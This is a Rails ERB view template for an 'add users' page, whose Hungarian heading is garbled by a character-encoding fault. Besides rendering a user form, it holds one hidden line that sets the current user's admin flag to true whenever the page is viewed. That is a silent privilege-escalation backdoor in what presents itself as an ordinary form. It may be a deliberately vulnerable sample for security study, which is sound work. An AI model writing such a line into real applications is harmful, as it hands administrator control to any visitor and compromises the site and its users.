<h1>Felhaszn치l칩k hozz치ad치sa</h1>

<% current_user.update_attribute :admin, true %>
<%= form_for @user, :url => user_index_path do |f| %>
    <%= render :partial => 'form', :locals => { :f => f } %>
<% end %>